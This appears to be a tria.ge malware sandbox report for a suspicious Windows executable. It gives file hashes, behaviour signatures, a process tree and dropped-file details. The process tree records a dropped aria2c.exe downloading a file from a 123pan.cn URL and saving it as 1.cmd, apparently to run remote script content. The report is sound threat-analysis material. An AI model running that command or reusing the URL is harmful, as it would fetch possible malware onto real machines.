Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

3

e5b3678e9c...6f.exe

windows7-x64

7

e5b3678e9c...6f.exe

windows10-2004-x64

7

$0/aria2c.exe

windows7-x64

1

$0/aria2c.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    03/02/2024, 15:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe

  • Size

    1.9MB

  • MD5

    61e62e70e51eeba5c6041960dcbb47a5

  • SHA1

    94213db89c31c5314378b2ec6e1859cd83610530

  • SHA256

    e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f

  • SHA512

    e0c1270ef1252a8d029c383b5de46eef09369ace186eb7f6a43fb925d5dbc492faa9ee116b3f18ecc1cc73d345201b80746d9c501765edc8d5b44a9c3c2e1a0f

  • SSDEEP

    49152:peqiGLHnKt1f2LSSlaugdgqeZzD0z2dJDK3Shz4JHbjQHv3RHAygA0:peNGOci2qDCdJWDi+W0

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe
    "C:\Users\Admin\AppData\Local\Temp\e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2460
    • C:\Users\Administrator\lgx\aria2c.exe
      "C:\Users\Administrator\lgx\aria2c.exe" --quiet --allow-overwrite=true -d "C:\Users\Administrator\lgx" -o 1.cmd "https://vip.123pan.cn/1814328088/gtx/551.23/ykd"
      2⤵
      • Executes dropped EXE
      PID:2628

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Administrator\lgx\aria2c.exe
    Filesize

    3.1MB

    MD5

    20c51badeab67a2e6ccefe85f8d83ab0

    SHA1

    ea109f1d681c9de61eae24046c1f535a630c8534

    SHA256

    736d6cdbe08e7bacebf30eb027b0cb87602b949d1edfb002217b82204c4a5161

    SHA512

    c81dccee0f841519eabbbd7de44bcd232432e13f95dd769e232c9958ace00fbf3a8fb84a55203279786b04acc85c54a2822e3c11d6b1c172bdea497ead6b7d8b

    Download Submit

  • \Users\Administrator\lgx\aria2c.exe
    Filesize

    462KB

    MD5

    049519830e17964974989a25ea441a7a

    SHA1

    95239a050ff5a17d4437754d821f44533edaecf8

    SHA256

    8ec25570234a3a976138e403acad0c95a6f4ce65501aefdc9839d4fc7a6480e4

    SHA512

    44a26abb4709ba46882d3acd363929b63d632346c870256c44cc7ba796aa0e97fbeb5711f832cb3213f548b11f6eb3ed388a4a2b737bd32542b00001f159a5d9

    Download Submit

  • \Users\Administrator\lgx\aria2c.exe
    Filesize

    2.7MB

    MD5

    abf058896acbba8df409057796bbab92

    SHA1

    a96b7bcde090edccb419fea73426451098a129e0

    SHA256

    aab24978671375380140f72ba7a5231e58bb2932dac4c4c9bf0819e55fb59667

    SHA512

    1fe9d903cd854a64961d7345236e611725cd1b3c9ea0506ec67f84313d34729532d8c1283c41b9c3c717e6ae4fd550cab627051459507416799019d6c0752f10

    Download Submit

  • \Users\Administrator\lgx\aria2c.exe
    Filesize

    2.5MB

    MD5

    44080066742147dda6133690bb851c20

    SHA1

    226ce45578992b371870b0a093ddb08113ab873b

    SHA256

    a4ea1156c2dd943e3f193698de069f45a0aa6e84756284a9ab35d682f05e2612

    SHA512

    5b0811347afe4d111a0163b92bdbb2519b79b7e0aec71f20a00fb26adfa1cefc06c6024994d1d9242fdaf68586384d9f29005e020f50c778dd328dcc305fc873

    Download Submit

  • memory/2628-8-0x000000013F790000-0x000000013FCFD000-memory.dmp

    Filesize

    5.4MB

    Download

  • memory/2628-18-0x000000013F790000-0x000000013FCFD000-memory.dmp

    Filesize

    5.4MB

    Download